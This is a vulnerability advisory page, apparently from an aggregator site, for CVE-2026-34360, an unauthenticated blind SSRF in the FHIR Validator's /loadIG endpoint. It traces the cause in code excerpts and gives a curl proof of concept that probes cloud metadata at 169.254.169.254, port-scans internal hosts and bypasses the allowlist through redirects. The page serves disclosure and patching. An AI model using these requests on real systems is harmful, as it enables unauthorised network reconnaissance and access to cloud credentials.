🛡️ CVE-2026-34360 — hl7-fhir-core

🟡 CVSS 5.8 — Medium ✅ No Known Exploit CWE-918 NVD
5.8
CVSS Score
0 Low4 Medium7 High9 Critical10

Description

FHIR Validator: Unauthenticated Blind SSRF via /loadIG Endpoint Enables Internal Network Probing

Summary

The /loadIG HTTP endpoint in the FHIR Validator HTTP service accepts a user-supplied URL via JSON body and makes server-side HTTP requests to it without any hostname, scheme, or domain validation. An unauthenticated attacker with network access to the validator can probe internal network services, cloud metadata endpoints, and map network topology through error-based information leakage. With explore=true (the default for this code path), each request triggers multiple outbound HTTP calls, amplifying reconnaissance capability.

Details

Root cause chain:

1. LoadIGHTTPHandler.handle() reads the ig field from user-supplied JSON and passes it directly to IgLoader.loadIg() with no validation:

```java

// LoadIGHTTPHandler.java:35,43

String ig = wrapper.asString("ig");

engine.getIgLoader().loadIg(engine.getIgs(), engine.getBinaries(), ig, false);

```

2. loadIg() calls loadIgSource(srcPackage, recursive, true) with explore=true (IgLoader.java:153).

3. loadIgSource() checks Common.isNetworkPath(src) which only verifies the URL starts with http: or https: — no host/IP validation (Common.java:14-16).

4. The URL reaches ManagedWebAccess.get() which calls inAllowedPaths(). This check is a no-op by default because allowedDomains is initialized as an empty list, and the code explicitly returns true when empty:

```java

// ManagedWebAccess.java:104-106

static boolean inAllowedPaths(String pathname) {

if (allowedDomains.isEmpty()) {

return true; // DEFAULT: all domains allowed

}

// ...

}

```

The source code has a //TODO get this from fhir settings comment (line 82) confirming this is an incomplete security control.

5. SimpleHTTPClient.get() makes the HTTP request and follows 301/302/307/308 redirects up to 5 times. Redirect targets are NOT re-validated against inAllowedPaths():

```java

// SimpleHTTPClient.java:88-99

case HttpURLConnection.HTTP_MOVED_PERM,

HttpURLConnection.HTTP_MOVED_TEMP,

307, 308:

String location = connection.getHeaderField("Location");

url = new URL(originalUrl, location); // No domain re-validation

continue;

```

6. The server binds to all interfaces with no authentication (FhirValidatorHttpService.java:31):

```java

server = HttpServer.create(new InetSocketAddress(port), 0);

```

7. Errors propagate back to the attacker with exception details:

```java

// LoadIGHTTPHandler.java:49

sendOperationOutcome(exchange, 500,

OperationOutcomeUtilities.createError("Failed to load IG: " + e.getMessage()), ...);

```

Redirect bypass: Even if allowedDomains were configured, the domain check in ManagedWebAccessor.setupSimpleHTTPClient() (line 31) only validates the initial URL. An attacker can host a redirect on an allowed domain that points to an internal target.

PoC

1. Start the FHIR Validator in HTTP server mode:

```bash

java -jar validator_cli.jar -server -port 8080

```

2. Probe a cloud metadata endpoint:

```bash

curl -X POST http://<validator-host>:8080/loadIG \

-H "Content-Type: application/json" \

-d '{"ig": "http://169.254.169.254/latest/meta-data/"}'

```

Expected: The validator makes a GET request to the AWS metadata service from its own network position. The error response reveals whether the endpoint is reachable (e.g., connection refused vs. parse error on HTML content).

3. Port scan an internal host:

```bash

# Open port — returns quickly with a parse error (content received but not valid FHIR)

curl -X POST http://<validator-host>:8080/loadIG \

-H "Content-Type: application/json" \

-d '{"ig": "http://10.0.0.1:8080/"}'

# Closed port — returns with "Connection refused"

curl -X POST http://<validator-host>:8080/loadIG \

-H "Content-Type: application/json" \

-d '{"ig": "http://10.0.0.1:9999/"}'

```

4. Redirect bypass (if allowedDomains were configured):

```bash

# Attacker hosts redirect: http://allowed-domain.com/redir → http://127.0.0.1:8080/admin

curl -X POST http://<validator-host>:8080/loadIG \

-H "Content-Type: application/json" \

-d '{"ig": "http://allowed-domain.com/redir"}'

```

The validator follows the redirect to the internal target without re-checking the domain allowlist.

Impact

An unauthenticated attacker with network access to the FHIR Validator HTTP service can:

  • Probe internal network services — differentiate open/closed ports and reachable/unreachable hosts via error message analysis (connection refused vs. timeout vs. content parse errors)
  • Access cloud metadata endpoints — reach AWS/GCP/Azure instance metadata services (169.254.169.254) from the validator's network position
  • Map internal network topology — systematically enumerate internal hosts and services
  • Bypass domain restrictions via redirects — even if allowedDomains is configured, redirect following does not re-validate targets
  • Amplify reconnaissance — each `

How this vulnerability can be exploited

This issue can be reached over the network, attack complexity is low, an attacker needs no privileges on the target. No user interaction is required. The scope is changed, meaning a successful attack can affect components beyond the vulnerable one. Rated impact: confidentiality low, integrity none, availability none.

Weakness class

CVE-2026-34360 is classified as CWE-918: Server-Side Request Forgery (SSRF). The server fetches a URL supplied by the caller, which can be pointed at internal systems it alone can reach.

Affected software

CVE-2026-34360 is recorded against 2 packages.

  • ca.uhn.hapi.fhir:org.hl7.fhir.core (fixed in 6.9.4)
  • hl7-fhir-core (fixed in 6.9.4)

Timeline and source

Published on 30 March 2026 and last revised on 31 March 2026. No public exploit is currently recorded for this entry. Record sourced from NVD.

References

github.com (Web)
nvd.nist.gov (Advisory)
github.com (Package)

CVE-2026-34360 on other distributions

Each distribution ships its own build and its own fixed version. Pick the one you run:

Details

Severity Medium
CVSS Score 5.8
CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
CWE CWE-918
Public Exploit ✅ No
Source NVD
Published 2026-03-30
Updated 2026-08-12
Modified 2026-03-31
Fix URL N/A

Affected Packages

Software From version Fixed in
ca.uhn.hapi.fhir:org.hl7.fhir.core 6.9.4
hl7-fhir-core 6.9.4

Vulnerability Monitoring

Track new vulnerabilities in hl7-fhir-core

CVE-2026-34360 is rated CVSS 5.8 Medium. BotEraser monitors your WordPress installation and notifies you when software you use appears in our vulnerability database.

Set Up Free Alerts →

No credit card required  ·  Results in minutes

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.